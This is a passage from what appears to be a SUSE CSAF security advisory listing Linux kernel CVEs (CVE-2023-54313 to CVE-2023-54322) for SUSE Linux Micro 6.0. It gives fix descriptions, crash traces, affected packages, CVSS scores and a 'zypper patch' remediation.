get_cached_acl_rcu+0x61/0xa0\n [ 205.490908] generic_permission+0x1bf/0x4e0\n [ 205.491447] ovl_permission+0x79/0x1b0\n [ 205.491917] inode_permission+0x15e/0x2c0\n [ 205.492425] link_path_walk+0x115/0x550\n [ 205.493311] path_lookupat.isra.0+0xb2/0x200\n [ 205.493803] filename_lookup+0xda/0x240\n [ 205.495747] vfs_fstatat+0x7b/0xb0\n\nFetch a reproducer in [Link].\n\nUse the helper ovl_i_path_realinode() to get realinode and then do\nnon-nullptr checking.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54313",
"url": "https://www.suse.com/security/cve/CVE-2023-54313"
},
{
"category": "external",
"summary": "SUSE Bug 1255775 for CVE-2023-54313",
"url": "https://bugzilla.suse.com/1255775"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54313"
},
{
"cve": "CVE-2023-54314",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54314"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: af9005: Fix null-ptr-deref in af9005_i2c_xfer\n\nIn af9005_i2c_xfer, msg is controlled by user. When msg[i].buf\nis null and msg[i].len is zero, former checks on msg[i].buf would be\npassed. Malicious data finally reach af9005_i2c_xfer. If accessing\nmsg[i].buf[0] without sanity check, null ptr deref would happen.\nWe add check on msg[i].len to prevent crash.\n\nSimilar commit:\ncommit 0ed554fd769a\n(\"media: dvb-usb: az6027: fix null-ptr-deref in az6027_i2c_xfer()\")",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54314",
"url": "https://www.suse.com/security/cve/CVE-2023-54314"
},
{
"category": "external",
"summary": "SUSE Bug 1255776 for CVE-2023-54314",
"url": "https://bugzilla.suse.com/1255776"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54314"
},
{
"cve": "CVE-2023-54315",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54315"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/powernv/sriov: perform null check on iov before dereferencing iov\n\nCurrently pointer iov is being dereferenced before the null check of iov\nwhich can lead to null pointer dereference errors. Fix this by moving the\niov null check before the dereferencing.\n\nDetected using cppcheck static analysis:\nlinux/arch/powerpc/platforms/powernv/pci-sriov.c:597:12: warning: Either\nthe condition \u0027!iov\u0027 is redundant or there is possible null pointer\ndereference: iov. [nullPointerRedundantCheck]\n num_vfs = iov-\u003enum_vfs;\n ^",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54315",
"url": "https://www.suse.com/security/cve/CVE-2023-54315"
},
{
"category": "external",
"summary": "SUSE Bug 1255769 for CVE-2023-54315",
"url": "https://bugzilla.suse.com/1255769"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54315"
},
{
"cve": "CVE-2023-54316",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54316"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nrefscale: Fix uninitalized use of wait_queue_head_t\n\nRunning the refscale test occasionally crashes the kernel with the\nfollowing error:\n\n[ 8569.952896] BUG: unable to handle page fault for address: ffffffffffffffe8\n[ 8569.952900] #PF: supervisor read access in kernel mode\n[ 8569.952902] #PF: error_code(0x0000) - not-present page\n[ 8569.952904] PGD c4b048067 P4D c4b049067 PUD c4b04b067 PMD 0\n[ 8569.952910] Oops: 0000 [#1] PREEMPT_RT SMP NOPTI\n[ 8569.952916] Hardware name: Dell Inc. PowerEdge R750/0WMWCR, BIOS 1.2.4 05/28/2021\n[ 8569.952917] RIP: 0010:prepare_to_wait_event+0x101/0x190\n :\n[ 8569.952940] Call Trace:\n[ 8569.952941] \u003cTASK\u003e\n[ 8569.952944] ref_scale_reader+0x380/0x4a0 [refscale]\n[ 8569.952959] kthread+0x10e/0x130\n[ 8569.952966] ret_from_fork+0x1f/0x30\n[ 8569.952973] \u003c/TASK\u003e\n\nThe likely cause is that init_waitqueue_head() is called after the call to\nthe torture_create_kthread() function that creates the ref_scale_reader\nkthread. Although this init_waitqueue_head() call will very likely\ncomplete before this kthread is created and starts running, it is\npossible that the calling kthread will be delayed between the calls to\ntorture_create_kthread() and init_waitqueue_head(). In this case, the\nnew kthread will use the waitqueue head before it is properly initialized,\nwhich is not good for the kernel\u0027s health and well-being.\n\nThe above crash happened here:\n\n\tstatic inline void __add_wait_queue(...)\n\t{\n\t\t:\n\t\tif (!(wq-\u003eflags \u0026 WQ_FLAG_PRIORITY)) \u003c=== Crash here\n\nThe offset of flags from list_head entry in wait_queue_entry is\n-0x18. If reader_tasks[i].wq.head.next is NULL as allocated reader_task\nstructure is zero initialized, the instruction will try to access address\n0xffffffffffffffe8, which is exactly the fault address listed above.\n\nThis commit therefore invokes init_waitqueue_head() before creating\nthe kthread.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54316",
"url": "https://www.suse.com/security/cve/CVE-2023-54316"
},
{
"category": "external",
"summary": "SUSE Bug 1255770 for CVE-2023-54316",
"url": "https://bugzilla.suse.com/1255770"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54316"
},
{
"cve": "CVE-2023-54318",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54318"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/smc: use smc_lgr_list.lock to protect smc_lgr_list.list iterate in smcr_port_add\n\nWhile doing smcr_port_add, there maybe linkgroup add into or delete\nfrom smc_lgr_list.list at the same time, which may result kernel crash.\nSo, use smc_lgr_list.lock to protect smc_lgr_list.list iterate in\nsmcr_port_add.\n\nThe crash calltrace show below:\nBUG: kernel NULL pointer dereference, address: 0000000000000000\nPGD 0 P4D 0\nOops: 0000 [#1] SMP NOPTI\nCPU: 0 PID: 559726 Comm: kworker/0:92 Kdump: loaded Tainted: G\nHardware name: Alibaba Cloud Alibaba Cloud ECS, BIOS 449e491 04/01/2014\nWorkqueue: events smc_ib_port_event_work [smc]\nRIP: 0010:smcr_port_add+0xa6/0xf0 [smc]\nRSP: 0000:ffffa5a2c8f67de0 EFLAGS: 00010297\nRAX: 0000000000000001 RBX: ffff9935e0650000 RCX: 0000000000000000\nRDX: 0000000000000010 RSI: ffff9935e0654290 RDI: ffff9935c8560000\nRBP: 0000000000000000 R08: 0000000000000000 R09: ffff9934c0401918\nR10: 0000000000000000 R11: ffffffffb4a5c278 R12: ffff99364029aae4\nR13: ffff99364029aa00 R14: 00000000ffffffed R15: ffff99364029ab08\nFS: 0000000000000000(0000) GS:ffff994380600000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000000 CR3: 0000000f06a10003 CR4: 0000000002770ef0\nPKRU: 55555554\nCall Trace:\n smc_ib_port_event_work+0x18f/0x380 [smc]\n process_one_work+0x19b/0x340\n worker_thread+0x30/0x370\n ? process_one_work+0x340/0x340\n kthread+0x114/0x130\n ? __kthread_cancel_work+0x50/0x50\n ret_from_fork+0x1f/0x30",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54318",
"url": "https://www.suse.com/security/cve/CVE-2023-54318"
},
{
"category": "external",
"summary": "SUSE Bug 1255772 for CVE-2023-54318",
"url": "https://bugzilla.suse.com/1255772"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54318"
},
{
"cve": "CVE-2023-54319",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54319"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npinctrl: at91-pio4: check return value of devm_kasprintf()\n\ndevm_kasprintf() returns a pointer to dynamically allocated memory.\nPointer could be NULL in case allocation fails. Check pointer validity.\nIdentified with coccinelle (kmerr.cocci script).\n\nDepends-on: 1c4e5c470a56 (\"pinctrl: at91: use devm_kasprintf() to avoid potential leaks\")\nDepends-on: 5a8f9cf269e8 (\"pinctrl: at91-pio4: use proper format specifier for unsigned int\")",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54319",
"url": "https://www.suse.com/security/cve/CVE-2023-54319"
},
{
"category": "external",
"summary": "SUSE Bug 1255760 for CVE-2023-54319",
"url": "https://bugzilla.suse.com/1255760"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54319"
},
{
"cve": "CVE-2023-54322",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54322"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\narm64: set __exception_irq_entry with __irq_entry as a default\n\nfilter_irq_stacks() is supposed to cut entries which are related irq entries\nfrom its call stack.\nAnd in_irqentry_text() which is called by filter_irq_stacks()\nuses __irqentry_text_start/end symbol to find irq entries in callstack.\n\nBut it doesn\u0027t work correctly as without \"CONFIG_FUNCTION_GRAPH_TRACER\",\narm64 kernel doesn\u0027t include gic_handle_irq which is entry point of arm64 irq\nbetween __irqentry_text_start and __irqentry_text_end as we discussed in below link.\nhttps://lore.kernel.org/all/CACT4Y+aReMGLYua2rCLHgFpS9io5cZC04Q8GLs-uNmrn1ezxYQ@mail.gmail.com/#t\n\nThis problem can makes unintentional deep call stack entries especially\nin KASAN enabled situation as below.\n\n[ 2479.383395]I[0:launcher-loader: 1719] Stack depot reached limit capacity\n[ 2479.383538]I[0:launcher-loader: 1719] WARNING: CPU: 0 PID: 1719 at lib/stackdepot.c:129 __stack_depot_save+0x464/0x46c\n[ 2479.385693]I[0:launcher-loader: 1719] pstate: 624000c5 (nZCv daIF +PAN -UAO +TCO -DIT -SSBS BTYPE=--)\n[ 2479.385724]I[0:launcher-loader: 1719] pc : __stack_depot_save+0x464/0x46c\n[ 2479.385751]I[0:launcher-loader: 1719] lr : __stack_depot_save+0x460/0x46c\n[ 2479.385774]I[0:launcher-loader: 1719] sp : ffffffc0080073c0\n[ 2479.385793]I[0:launcher-loader: 1719] x29: ffffffc0080073e0 x28: ffffffd00b78a000 x27: 0000000000000000\n[ 2479.385839]I[0:launcher-loader: 1719] x26: 000000000004d1dd x25: ffffff891474f000 x24: 00000000ca64d1dd\n[ 2479.385882]I[0:launcher-loader: 1719] x23: 0000000000000200 x22: 0000000000000220 x21: 0000000000000040\n[ 2479.385925]I[0:launcher-loader: 1719] x20: ffffffc008007440 x19: 0000000000000000 x18: 0000000000000000\n[ 2479.385969]I[0:launcher-loader: 1719] x17: 2065726568207475 x16: 000000000000005e x15: 2d2d2d2d2d2d2d20\n[ 